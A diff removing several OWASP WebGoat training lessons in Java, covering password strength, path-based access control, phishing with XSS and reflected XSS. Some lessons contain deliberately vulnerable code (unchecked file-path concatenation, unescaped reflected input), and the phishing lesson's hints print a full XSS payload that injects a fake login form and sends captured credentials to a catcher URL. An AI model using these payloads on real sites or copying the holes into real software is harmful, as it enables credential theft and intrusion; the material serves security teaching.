-        for ( int i = 1; i <= passwords.size(); i++ ) {
-            String key = "pass" + i;
-            allCorrect = allCorrect && s.getParser().getStringParameter(key, "").equals(passwords.get(key).answer);
-        }
-        return allCorrect;
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            if (checkSolution(s))
-            {
-                makeSuccess(s);
-                ec.addElement(new BR());
-                ec.addElement(new StringElement("As a guideline not bound to a single solution."));
-                ec.addElement(new BR());
-                ec.addElement(new StringElement("Assuming the calculations per second 4 billion: "));
-                ec.addElement(new BR());
-                OL ol = new OL();
-                for ( Password password : passwords.values()) {
-                    ol.addElement(new LI(String.format("%s - %s %s (%s)", password.password, password.answer, password.timeUnit, password.explanation)));
-                }
-                ec.addElement(ol);
-            } else
-            {
-                ec.addElement(new BR());
-                ec.addElement(new StringElement("How much time would a desktop PC take to crack these passwords?"));
-                ec.addElement(new BR());
-                ec.addElement(new BR());
-                Table table = new Table();
-                for ( Entry<String, Password> entry : passwords.entrySet()) {
-                    TR tr = new TR();
-                    TD td1 = new TD();
-                    TD td2 = new TD();
-                    Input input1 = new Input(Input.TEXT, entry.getKey(), "");
-                    td1.addElement(new StringElement("Password = " + entry.getValue().password));
-                    td1.setWidth("50%");
-                    td2.addElement(input1);
-                    td2.addElement(new StringElement("  " + entry.getValue().timeUnit));
-                    tr.addElement(td1);
-                    tr.addElement(td2);
-                    table.addElement(tr);
-                }
-                ec.addElement(table);
-                ec.addElement(new BR());
-                ec.addElement(new BR());
-                Div div = new Div();
-                div.addAttribute("align", "center");
-                Element b = ECSFactory.makeButton("Go!");
-                div.addElement(b);
-                ec.addElement(div);
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-
-        return (ec);
-    }
-
-    /**
-     * Gets the hints attribute of the HelloScreen object
-     * 
-     * @return The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Copy the passwords into the code checker.");
-        return hints;
-    }
-
-    /**
-     * Gets the ranking attribute of the HelloScreen object
-     * 
-     * @return The ranking value
-     */
-    private final static Integer DEFAULT_RANKING = new Integer(6);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    protected Category getDefaultCategory()
-    {
-        return Category.AUTHENTICATION;
-    }
-
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "The accounts of your web application are only as save as the passwords. "
-                + "For this exercise, your job is to test several passwords on <a onclick=\"window.open(this.href,\'_blank\');return false;\" href=\"https://howsecureismypassword.net\">https://howsecureismypassword.net</a>. "
-                + " You must test all 6 passwords at the same time...<br>"
-                + "<b> On your applications you should set good password requirements! </b>";
-        return (instructions);
-    }
-    
-    /**
-     * Gets the title attribute of the HelloScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Password Strength");
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement(""));
-    }
-}

src/main/java/org/owasp/webgoat/lessons/PathBasedAccessControl.java

@@ -1,268 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.io.BufferedReader;
-import java.io.File;
-import java.io.FileReader;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-public class PathBasedAccessControl extends LessonAdapter
-{
-
-    private final static String FILE = "File";
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            String dir = s.getContext().getRealPath("/lesson_plans/en");
-            File d = new File(dir);
-
-            Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center");
-
-            if (s.isColor())
-            {
-                t.setBorder(1);
-            }
-
-            String[] list = d.list();
-            String listing = " <p><B>"+getLabelManager().get("CurrentDirectory")+"</B> " + Encoding.urlDecode(dir)
-                    + "<br><br>"+getLabelManager().get("ChooseFileToView")+"</p>";
-
-            TR tr = new TR();
-            tr.addElement(new TD().setColSpan(2).addElement(new StringElement(listing)));
-            t.addElement(tr);
-
-            tr = new TR();
-            tr.addElement(new TD().setWidth("35%").addElement(ECSFactory.makePulldown(FILE, list, "", 15)));
-            tr.addElement(new TD().addElement(ECSFactory.makeButton(getLabelManager().get("ViewFile"))));
-            t.addElement(tr);
-
-            ec.addElement(t);
-
-            // FIXME: would be cool to allow encodings here -- hex, percent,
-            // url, etc...
-            String file = s.getParser().getRawParameter(FILE, "");
-
-            // defuse file searching
-            boolean illegalCommand = getWebgoatContext().isDefuseOSCommands();
-            if (getWebgoatContext().isDefuseOSCommands())
-            {
-                // allow them to look at any file in the webgoat hierachy. Don't
-                // allow them
-                // to look about the webgoat root, except to see the LICENSE
-                // file
-                if (upDirCount(file) == 3 && !file.endsWith("LICENSE"))
-                {
-                    s.setMessage(getLabelManager().get("AccessDenied"));
-                    s.setMessage(getLabelManager().get("ItAppears1"));
-                }
-                else if (upDirCount(file) > 3)
-                {
-                    s.setMessage(getLabelManager().get("AccessDenied"));
-                    s.setMessage(getLabelManager().get("ItAppears2"));
-                }
-                else
-                {
-                    illegalCommand = false;
-                }
-            }
-
-            // Using the URI supports encoding of the data.
-            // We could force the user to use encoded '/'s == %2f to make the lesson more difficult.
-            // We url Encode our dir name to avoid problems with special characters in our own path.
-            // File f = new File( new URI("file:///" +
-            // Encoding.urlEncode(dir).replaceAll("\\\\","/") + "/" +
-            // file.replaceAll("\\\\","/")) );
-            File f = new File((dir + "\\" + file).replaceAll("\\\\", "/"));
-
-            if (s.isDebug())
-            {
-
-                s.setMessage(getLabelManager().get("File") + file);
-                s.setMessage(getLabelManager().get("Dir")+ dir);
-                // s.setMessage("File URI: " + "file:///" +
-                // (Encoding.urlEncode(dir) + "\\" +
-                // Encoding.urlEncode(file)).replaceAll("\\\\","/"));
-                s.setMessage(getLabelManager().get("IsFile")+ f.isFile());
-                s.setMessage(getLabelManager().get("Exists") + f.exists());
-            }
-            if (!illegalCommand)
-            {
-                if (f.isFile() && f.exists())
-                {
-                    // Don't set completion if they are listing files in the
-                    // directory listing we gave them.
-                    if (upDirCount(file) >= 1)
-                    {
-                        s.setMessage(getLabelManager().get("CongratsAccessToFileAllowed"));
-                        s.setMessage(" ==> " + Encoding.urlDecode(f.getCanonicalPath()));
-                        makeSuccess(s);
-                    }
-                    else
-                    {
-                        s.setMessage(getLabelManager().get("FileInAllowedDirectory"));
-                        s.setMessage(" ==> " + Encoding.urlDecode(f.getCanonicalPath()));
-                    }
-                }
-                else if (file != null && file.length() != 0)
-                {
-                    s
-                            .setMessage(getLabelManager().get("AccessToFileDenied1") + Encoding.urlDecode(f.getCanonicalPath())
-                                    +  getLabelManager().get("AccessToFileDenied2"));
-                }
-                else
-                {
-                    // do nothing, probably entry screen
-                }
-
-                try
-                {
-                    // Show them the file
-                    // Strip out some of the extra html from the "help" file
-                    ec.addElement(new BR());
-                    ec.addElement(new BR());
-                    ec.addElement(new HR().setWidth("100%"));
-                    ec.addElement(getLabelManager().get("ViewingFile")+ f.getCanonicalPath());
-                    ec.addElement(new HR().setWidth("100%"));
-                    if (f.length() > 80000) { throw new Exception(getLabelManager().get("FileTooLarge")); }
-                    String fileData = getFileText(new BufferedReader(new FileReader(f)), false);
-                    if (fileData.indexOf(0x00) != -1) { throw new Exception(getLabelManager().get("FileBinary")); }
-                    ec.addElement(new StringElement(fileData.replaceAll(System.getProperty("line.separator"), "<br>")
-                            .replaceAll("(?s)<!DOCTYPE.*/head>", "").replaceAll("<br><br>", "<br>")
-                            .replaceAll("<br>\\s<br>", "<br>").replaceAll("<\\?", "&lt;").replaceAll("<(r|u|t)",
-                                                                                                        "&lt;$1")));
-                } catch (Exception e)
-                {
-                    ec.addElement(new BR());
-                    ec.addElement(getLabelManager().get("TheFollowingError"));
-                    ec.addElement(e.getMessage());
-                }
-            }
-        } catch (Exception e)
-        {
-            s.setMessage(getLabelManager().get("ErrorGenerating")+ this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    private int upDirCount(String fileName)
-    {
-        int count = 0;
-        int startIndex = fileName.indexOf("..");
-        while (startIndex != -1)
-        {
-            count++;
-            startIndex = fileName.indexOf("..", startIndex + 1);
-        }
-        return count;
-    }
-
-    /**
-     * DOCUMENT ME!
-     * 
-     * @return DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.ACCESS_CONTROL;
-    }
-
-    /**
-     * Gets the hints attribute of the AccessControlScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add(getLabelManager().get("PathBasedAccessControlHint1"));
-        hints.add(getLabelManager().get("PathBasedAccessControlHint2"));
-        hints.add(getLabelManager().get("PathBasedAccessControlHint3"));
-        hints.add(getLabelManager().get("PathBasedAccessControlHint4"));
-        
-        return hints;
-    }
-
-    /**
-     * Gets the instructions attribute of the WeakAccessControl object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-        String instructions = getLabelManager().get("PathBasedAccessControlInstr1")+ s.getUserName() + getLabelManager().get("PathBasedAccessControlInstr2");
-
-        return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(115);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the AccessControlScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Bypass a Path Based Access Control Scheme");
-    }
-}

src/main/java/org/owasp/webgoat/lessons/Phishing.java

@@ -1,297 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Comment;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.Catcher;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created March 13, 2007
- */
-public class Phishing extends LessonAdapter
-{
-
-    /**
-     * Description of the Field
-     */
-    protected final static String SEARCH = "Username";
-    private String searchText;
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    private boolean postedCredentials(WebSession s)
-    {
-        String postedToCookieCatcher = getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY,
-                                                                                                Catcher.EMPTY_STRING);
-
-        // <START_OMIT_SOURCE>
-        return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
-        // <END_OMIT_SOURCE>
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            searchText = s.getParser().getRawParameter(SEARCH, "");
-            // <START_OMIT_SOURCE>
-            // <END_OMIT_SOURCE>
-
-            ec.addElement(makeSearch(s));
-            if (postedCredentials(s))
-            {
-                makeSuccess(s);
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-        }
-
-        return (ec);
-    }
-
-    protected Element makeSearch(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        ec.addElement(new H1().addElement("WebGoat Search "));
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center");
-
-        TR tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-        t.addElement(tr);
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        tr = new TR();
-        tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2)
-                .setAlign("center"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-        t.addElement(tr);
-
-        TR row1 = new TR();
-        row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
-
-        Input input1 = new Input(Input.TEXT, SEARCH, searchText);
-        row1.addElement(new TD(input1).setAlign("left"));
-        t.addElement(row1);
-
-        Element b = ECSFactory.makeButton("Search");
-        t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
-        ec.addElement(t);
-
-        if (!searchText.equals(""))
-        {
-            ec.addElement(new BR());
-            ec.addElement(new HR());
-            ec.addElement(new BR());
-            ec.addElement(new StringElement("Results for: " + searchText));
-            ec.addElement(new Comment("Search results"));
-            ec.addElement(new BR());
-            ec.addElement(new BR());
-            ec.addElement(new B(new StringElement("No results were found.")));
-            ec.addElement(new Comment("End of Search results"));
-        }
-
-        return (ec);
-    }
-
-    /**
-     * Gets the hints attribute of the CluesScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Try adding HTML to the search field to create a fake authentication form.<BR>"
-                + "Try to make the form look official.");
-        hints
-                .add("Try: <BR> "
-                        + "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
-                        + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
-                        + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
-                        + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
-        hints
-                .add("Add functionality that can post a request, a button might work<BR><BR>"
-                        + "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
-                        + "http://localhost/webgoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
-        hints
-                .add("Try: <BR> "
-                        + "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
-                        + "value=&quot;login&quot;&gt;"
-                        + "<BR><BR>In the whole script:<BR><BR>"
-                        + "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
-                        + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
-                        + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
-                        + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
-                        + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
-        hints
-                .add("Make the button perform an action on submit, <BR>"
-                        + "adding an onclick=\"hack()\" might work<BR>"
-                        + "Don't forget to add the hack() javascript function"
-                        + "<BR><BR>In the whole script:<BR><BR>"
-                        + "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
-                        + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
-                        + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
-                        + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
-                        + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;<BR>"
-                        + "Also, check firebug. Does the search form need to be terminated for this to work...? (&lt;/form&gt;)");
-        hints
-                .add("You need to create the hack() function.  This function will pull the credentials from the "
-                        + "webpage and post them to the WebGoat catcher servlet. <BR>"
-                        + "<BR> Some useful code snippets:<UL>"
-                        + "<LI>doucument.phish.user.value - will access the user field"
-                        + "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
-                        + "<LI>javascript string concatentation uses a \"+\" </UL>"
-                        + "<BR><BR>The entire javascript portion:<BR><BR>"
-                        + "&lt;script&gt;function hack(){ "
-                        + "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
-                        + "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
-                        + "alert(&quot;Had this been a real attack... Your credentials were just stolen."
-                        + "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; +  document.phish.pass.value);} "
-                        + "&lt;/script&gt;");
-        hints
-                .add("Complete solution for this lesson:<BR><BR>"
-                        + "&lt;/form&gt;&lt;script&gt;function hack(){ "
-                        + "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
-                        + "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
-                        + "alert(&quot;Had this been a real attack... Your credentials were just stolen."
-                        + "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; +  document.phish.pass.value);} "
-                        + "&lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
-                        + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
-                        + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
-                        + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
-                        + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
-        /**
-         * password<script>function hack(){ alert("Had this been a real attack... Your credentials
-         * were just stolen.\nUser Name = " + document.phish.user.value + "\nPassword = " +
-         * document.phish.pass.value); XSSImage=new Image;
-         * XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="
-         * +document.phish.user.value + "&password=" + document.phish.pass.value +
-         * "";}</script><form name="phish"><br>
-         * <br>
-         * <HR>
-         * <H3>This feature requires account login:</H2> <br>
-         * <br>
-         * Enter Username:<br>
-         * <input type="text" name="user"><br>
-         * Enter Password:<br>
-         * <input type="password" name = "pass"><br>
-         * <input type="submit" name="login" value="login" onclick="hack()"></form><br>
-         * <br>
-         * <HR>
-         * <!--
-         * 
-         */
-        return hints;
-    }
-
-    /**
-     * Gets the instructions attribute of the XssSearch object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "This lesson is an example of how a website might support a phishing attack<BR><BR>"
-                + "Below is an example of a standard search feature.<br>"
-                + "Using XSS and HTML insertion, your goal is to: <UL>"
-                + "<LI>Insert html to that requests credentials"
-                + "<LI>Add javascript to actually collect the credentials"
-                + "<LI>Post the credentials to http://localhost/webgoat/catcher?PROPERTY=yes...</UL> "
-                + "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
-
-        return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(30);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the category attribute of the FailOpenAuthentication object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.XSS;
-    }
-
-    /**
-     * Gets the title attribute of the CluesScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Phishing with XSS");
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/ReflectedXSS.java

@@ -1,256 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.text.DecimalFormat;
-import java.util.ArrayList;
-import java.util.List;
-import java.util.regex.Pattern;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Center;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.util.HtmlEncoder;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-
-public class ReflectedXSS extends LessonAdapter
-{
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    protected Element createContent(WebSession s)
-    {
-
-        ElementContainer ec = new ElementContainer();
-        String regex1 = "^[0-9]{3}$";// any three digits
-        Pattern pattern1 = Pattern.compile(regex1);
-
-        try
-        {
-            String param1 = s.getParser().getRawParameter("field1", "111");
-            String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214 0002 1999"));
-            float quantity = 1.0f;
-            float total = 0.0f;
-            float runningTotal = 0.0f;
-
-            DecimalFormat money = new DecimalFormat("$0.00");
-
-            // test input field1
-            if (!pattern1.matcher(param1).matches())
-            {
-                if (param1.toLowerCase().indexOf("script") != -1)
-                {
-                    makeSuccess(s);
-                }
-
-                s.setMessage(getLabelManager().get("ReflectedXSSWhoops1")+ param1 + getLabelManager().get("ReflectedXSSWhoops2"));
-            }
-
-            // FIXME: encode output of field2, then s.setMessage( field2 );
-
-            ec.addElement(new HR().setWidth("90%"));
-            ec.addElement(new Center().addElement(new H1().addElement(getLabelManager().get("ShoppingCart"))));
-            Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
-
-            if (s.isColor())
-            {
-                t.setBorder(1);
-            }
-
-            TR tr = new TR();
-            tr.addElement(new TH().addElement(getLabelManager().get("ShoppingCartItems")).setWidth("80%"));
-            tr.addElement(new TH().addElement(getLabelManager().get("Price")).setWidth("10%"));
-            tr.addElement(new TH().addElement(getLabelManager().get("Quantity")).setWidth("3%"));
-            tr.addElement(new TH().addElement(getLabelManager().get("Total")).setWidth("7%"));
-            t.addElement(tr);
-
-            tr = new TR();
-            tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
-            tr.addElement(new TD().addElement("69.99").setAlign("right"));
-            tr.addElement(new TD().addElement(
-                                                new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1",
-                                                                                                                "1"))
-                                                        .setSize(6)).setAlign("right"));
-            quantity = s.getParser().getFloatParameter("QTY1", 0.0f);
-            total = quantity * 69.99f;
-            runningTotal += total;
-            tr.addElement(new TD().addElement(money.format(total)));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case"));
-            tr.addElement(new TD().addElement("27.99").setAlign("right"));
-            tr.addElement(new TD().addElement(
-                                                new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2",
-                                                                                                                "1"))
-                                                        .setSize(6)).setAlign("right"));
-            quantity = s.getParser().getFloatParameter("QTY2", 0.0f);
-            total = quantity * 27.99f;
-            runningTotal += total;
-            tr.addElement(new TD().addElement(money.format(total)));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel Centrino"));
-            tr.addElement(new TD().addElement("1599.99").setAlign("right"));
-            tr.addElement(new TD().addElement(
-                                                new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3",
-                                                                                                                "1"))
-                                                        .setSize(6)).setAlign("right"));
-            quantity = s.getParser().getFloatParameter("QTY3", 0.0f);
-            total = quantity * 1599.99f;
-            runningTotal += total;
-            tr.addElement(new TD().addElement(money.format(total)));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over "));
-            tr.addElement(new TD().addElement("299.99").setAlign("right"));
-
-            tr.addElement(new TD().addElement(
-                                                new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4",
-                                                                                                                "1"))
-                                                        .setSize(6)).setAlign("right"));
-            quantity = s.getParser().getFloatParameter("QTY4", 0.0f);
-            total = quantity * 299.99f;
-            runningTotal += total;
-            tr.addElement(new TD().addElement(money.format(total)));
-            t.addElement(tr);
-
-            ec.addElement(t);
-
-            t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-            if (s.isColor())
-            {
-                t.setBorder(1);
-            }
-
-            ec.addElement(new BR());
-
-            tr = new TR();
-            tr.addElement(new TD().addElement(getLabelManager().get("TotalChargedCreditCard")+":"));
-            tr.addElement(new TD().addElement(money.format(runningTotal)));
-            tr.addElement(new TD().addElement(ECSFactory.makeButton(getLabelManager().get("UpdateCart"))));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement(getLabelManager().get("EnterCreditCard")+":"));
-            tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2", param2)));
-            t.addElement(tr);
-            tr = new TR();
-            tr.addElement(new TD().addElement(getLabelManager().get("Enter3DigitCode")+":"));
-            tr.addElement(new TD().addElement("<input name='field1' type='TEXT' value='" + param1 + "'>"));
-            // tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",param1)));
-            t.addElement(tr);
-
-            Element b = ECSFactory.makeButton(getLabelManager().get("Purchase"));
-            tr = new TR();
-            tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("center"));
-            t.addElement(tr);
-
-            ec.addElement(t);
-            ec.addElement(new BR());
-            ec.addElement(new HR().setWidth("90%"));
-        } catch (Exception e)
-        {
-            s.setMessage(getLabelManager().get("ErrorGenerating") + this.getClass().getName());
-            e.printStackTrace();
-        }
-        return (ec);
-    }
-
-    /**
-     * DOCUMENT ME!
-     * 
-     * @return DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()
